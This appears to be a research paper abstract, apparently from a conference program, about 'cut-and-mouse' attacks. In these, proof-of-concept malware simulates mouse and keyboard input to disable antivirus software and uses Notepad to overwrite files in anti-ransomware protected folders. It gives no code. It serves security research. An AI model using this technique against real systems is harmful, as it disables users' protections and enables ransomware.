Full Program »
A Game of "Cut and Mouse": Bypassing Antivirus by Simulating User Inputs
Most users and companies heavily rely on anti-virus (AV) software to protect their digital assets, mainly programs and data, from malware attacks. AV are however engaged in a \emph{cat-and-mouse} game with malware. These latter are trying to bypass (evade) AVs \eg through obfuscation and polymorphism, or to disable AVs \eg through denial of service attacks or by sending malformed packets or parameters to crash the AV. In turn, AV try to mitigate the first class of attacks by some form of anomaly or behavioral detection and to stop the second one by hardening up, \eg by using OS protection, standard code, and binary protection techniques. In return, malware attempt to bypass behavioral detection by using, for instance, adversarial inputs, etc. The \emph{cat-and-mouse} game goes on apparently endlessly. In this paper, we investigate one additional, and novel, move in this game. We investigate whether we can instrument a malware to send keyboard and mouse events, such as ``cut and paste'' and ``click'' events, to deactivate some key AVs functionalities---thus, entirely bypassing their protection mechanisms. We have tested the resilience of several AVs to be disabled by a proof-of-concept malware mimicking user inputs on the main graphical interface to turn the AVs off. What we have found is disturbing: most of the AVs can be easily disabled by such an attack. We have then extended the attack from deactivating high-integrity applications to sending them keyboard and mouse events to perform malicious operations on behalf of the malware. We have found that we can circumvent anti-ransomware protected folders features by exploiting and controlling a whitelisted application, namely \code{Notepad}, to bypass the restrictions in place. In fact, we manage to use \code{Notepad} as a puppet to rewrite the content of a protected file. Recalling the previous analogy of cat-and-mouse game, we have called this class of attacks \emph{cut-and-mouse}.